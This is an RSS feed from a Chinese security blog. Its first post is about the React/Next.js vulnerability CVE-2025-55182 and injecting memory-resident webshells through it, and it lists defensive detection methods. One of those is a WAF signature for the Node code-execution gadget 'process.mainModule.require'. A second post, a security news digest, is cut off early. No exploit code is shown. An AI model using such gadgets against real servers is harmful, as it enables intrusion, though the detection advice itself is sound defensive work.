<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>甲方安全建设</title>
    <link>https://wechat2rss.xlab.app/feed/130f6c9e835ca7f7c9f329a93140129499970662.xml</link>
    <description>甲方安全建设的点滴，共同学习，一起进步。 笔耕不辍也是对自我的督促。&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (甲方安全建设)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM6uQhtEfmibibibDzhUHIB3zDesFJWG4JVI3UkCvJKAuJvYA/0</url>
      <title>甲方安全建设</title>
      <link>https://wechat2rss.xlab.app/feed/130f6c9e835ca7f7c9f329a93140129499970662.xml</link>
    </image>
    <item>
      <title>前端圈的核弹: CVE-2025-55182 React/next.js 内存马的一些玩法</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487754&amp;idx=1&amp;sn=72ed5ee33e0e652093785170ca3cd2ac</link>
      <description>前端圈的核弹: CVE-2025-55182 React/next.js 内存马的一些玩法</description>
      <content:encoded><![CDATA[<p>
原创 <span>red4blue</span> <span>2025-12-05 11:22</span> <span style="display: inline-block;">北京</span>
</p>




<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=63ad6749&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnPgpPOh7Rag5EzHib3KaM5PvGzFh8GHDZWUM5XXQiabHwzh9hZcTE9Q9EWiarywlCFP8C3v6n6vHSEQ%2F0%3Fwx_fmt%3Djpeg"/></p>

<p>前端圈的核弹: CVE-2025-55182 React/next.js 内存马的一些玩法</p>

<div data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#39;Microsoft YaHei&#39;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;overflow-wrap: break-word;text-align: left;" data-pm-slice="0 0 []"><ul style="list-style-type: disc;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">告警和资讯 </span><code style="color: rgb(239, 112, 96);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: transparent;background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);overflow-wrap: break-word;padding-top: 2px;padding-right: 4px;padding-bottom: 2px;padding-left: 4px;border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;margin-top: 0px;margin-right: 2px;margin-bottom: 0px;margin-left: 2px;font-family: &#39;Operator Mono&#39;, Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">自动化安全资讯推送</span></code></p></li></ul><blockquote style="margin-top: 20px;margin-bottom: 20px;margin-left: 0px;margin-right: 0px;padding-top: 10px;padding-bottom: 10px;padding-left: 20px;padding-right: 10px;border-top-style: none;border-bottom-style: none;border-left-style: solid;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgb(239, 112, 96);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;background-attachment: scroll;background-clip: border-box;background-color: rgb(255, 249, 249);background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;display: block;overflow-x: auto;overflow-y: auto;"><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;color: rgb(0, 0, 0);font-size: 15px;line-height: 1.8em;letter-spacing: 0px;text-align: left;font-weight: normal;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;"><span leaf="">凌晨有一些push过来了.</span></p></blockquote><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100004101" data-ratio="1.4787037037037036" style="display: block;margin-top: 0px;margin-right: auto;margin-bottom: 0px;margin-left: auto;max-width: 100%;" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=7551315a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnPgpPOh7Rag5EzHib3KaM5PIgQu2Uiarb2t1g7IWTqeeFw2zwBnTu9TbxVDxAIcJrmVmwAWiaT8uq4w%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/><img data-imgfileid="100004102" class="rich_pages wxw-img" data-ratio="0.7509259259259259" data-type="jpeg" data-w="1080" style="display: block;margin-top: 0px;margin-right: auto;margin-bottom: 0px;margin-left: auto;max-width: 100%;" src="https://wechat2rss.xlab.app/img-proxy/?k=a249961d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnPgpPOh7Rag5EzHib3KaM5Pnoh6oCr4Ckmm9AgvpIPdlnvpcH3RGicgtCnboUFyNzWSzZApkWaTiceQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><ul style="list-style-type: disc;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">一些无损检测方法</span></p></li></ul><blockquote style="margin-top: 20px;margin-bottom: 20px;margin-left: 0px;margin-right: 0px;padding-top: 10px;padding-bottom: 10px;padding-left: 20px;padding-right: 10px;border-top-style: none;border-bottom-style: none;border-left-style: solid;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgb(239, 112, 96);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;background-attachment: scroll;background-clip: border-box;background-color: rgb(255, 249, 249);background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;display: block;overflow-x: auto;overflow-y: auto;"><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;color: rgb(0, 0, 0);font-size: 15px;line-height: 1.8em;letter-spacing: 0px;text-align: left;font-weight: normal;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;"><code style="color: rgb(239, 112, 96);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: transparent;background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);overflow-wrap: break-word;padding-top: 2px;padding-right: 4px;padding-bottom: 2px;padding-left: 4px;border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;margin-top: 0px;margin-right: 2px;margin-bottom: 0px;margin-left: 2px;font-family: &#39;Operator Mono&#39;, Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">根据返回包之类强特征、或者解析dns等等、不要堵塞人家服务</span></code></p></blockquote><ul style="list-style-type: disc;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">打入内存马</span></p></li></ul><blockquote style="margin-top: 20px;margin-bottom: 20px;margin-left: 0px;margin-right: 0px;padding-top: 10px;padding-bottom: 10px;padding-left: 20px;padding-right: 10px;border-top-style: none;border-bottom-style: none;border-left-style: solid;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgb(239, 112, 96);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;background-attachment: scroll;background-clip: border-box;background-color: rgb(255, 249, 249);background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;display: block;overflow-x: auto;overflow-y: auto;"><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;color: rgb(0, 0, 0);font-size: 15px;line-height: 1.8em;letter-spacing: 0px;text-align: left;font-weight: normal;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;"><span leaf="">我一堆 next.js 应用，翻了下依赖和测试，有一个新的中招了 😂</span></p></blockquote><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><span leaf=""><img data-imgfileid="100004099" class="rich_pages wxw-img" data-ratio="0.5796296296296296" data-type="jpeg" data-w="1080" style="display: block;margin-top: 0px;margin-right: auto;margin-bottom: 0px;margin-left: auto;max-width: 100%;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;object-fit: fill;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=ac04430e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnPgpPOh7Rag5EzHib3KaM5PlhjiaxNPic3A3B4OTMhHg5LyP7LKQY9GjvawzqjCRuakfBpEic7ib1bvHg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></figure><ul style="list-style-type: disc;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">潜在影响范围(子集)</span></p></li></ul><blockquote style="margin-top: 20px;margin-bottom: 20px;margin-left: 0px;margin-right: 0px;padding-top: 10px;padding-bottom: 10px;padding-left: 20px;padding-right: 10px;border-top-style: none;border-bottom-style: none;border-left-style: solid;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgb(239, 112, 96);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;background-attachment: scroll;background-clip: border-box;background-color: rgb(255, 249, 249);background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;display: block;overflow-x: auto;overflow-y: auto;"><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;color: rgb(0, 0, 0);font-size: 15px;line-height: 1.8em;letter-spacing: 0px;text-align: left;font-weight: normal;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;margin-left: 0px;"><span leaf="">next.js 还是非常好用的，ai相关的资产/ai生成的服务也很多.</span></p></blockquote><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><span leaf=""><img data-imgfileid="100004100" class="rich_pages wxw-img" data-ratio="0.7731481481481481" data-type="jpeg" data-w="1080" style="display: block;margin-top: 0px;margin-right: auto;margin-bottom: 0px;margin-left: auto;max-width: 100%;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;object-fit: fill;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=23a34b22&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZnPgpPOh7Rag5EzHib3KaM5PBRQC1hPqoTev3ibKECBIKuevZgqsYpx1c7bxBT3hleCSgzdQBpdF4ibg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></figure><ul style="list-style-type: disc;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">部分检测方法</span></p></li></ul><ol style="list-style-type: decimal;margin-top: 8px;margin-bottom: 8px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 25px;padding-right: 0px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">公开poc的一些强特征 (有些复制粘贴一把梭的)</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">白盒匹配 </span><code style="color: rgb(239, 112, 96);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: transparent;background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);overflow-wrap: break-word;padding-top: 2px;padding-right: 4px;padding-bottom: 2px;padding-left: 4px;border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;margin-top: 0px;margin-right: 2px;margin-bottom: 0px;margin-left: 2px;font-family: &#39;Operator Mono&#39;, Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">cat package.json|ag &#39;&#34;next&#34;&#39;</span></code><span leaf=""> 之类的具体版本</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">waf匹配利用过程的一些强特征，如 </span><code style="color: rgb(239, 112, 96);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: transparent;background-image: none;background-origin: padding-box;background-position-x: 0%;background-position-y: 0%;background-repeat: no-repeat;background-size: auto;width: auto;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);overflow-wrap: break-word;padding-top: 2px;padding-right: 4px;padding-bottom: 2px;padding-left: 4px;border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;margin-top: 0px;margin-right: 2px;margin-bottom: 0px;margin-left: 2px;font-family: &#39;Operator Mono&#39;, Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">process.mainModule.require</span></code><span leaf=""> 等等</span></p></li><li><p style="margin-top: 5px;margin-bottom: 5px;color: rgb(1, 1, 1);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;font-weight: normal;"><span leaf="">rasp/hids 匹配node相关的的进程、文件读写、网络连接、域名解析.</span></p></li></ol></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="2247487754">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3a78dbdd&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487754%26idx%3D1%26sn%3D72ed5ee33e0e652093785170ca3cd2ac">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 05 Dec 2025 11:22:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」1025 | apt报告、红蓝工具节选</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487746&amp;idx=1&amp;sn=b9fb556b77eda920dbd5eca110e709ac</link>
      <description>涵盖z国背景APT团伙、Windows提权漏洞、Grafana安全漏洞等</description>
      <content:encoded><![CDATA[<p>
<span>red4blue</span> <span>2024-10-25 15:42</span> <span style="display: inline-block;">北京</span>
</p>

<p>涵盖z国背景APT团伙、Windows提权漏洞、Grafana安全漏洞等</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=a0f30d39&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAXNaDCpmPGaK2L6nicZsLrSma8kAh27vl4sxgqcXXghyoX2k1Z5TnNRA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-10-25 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
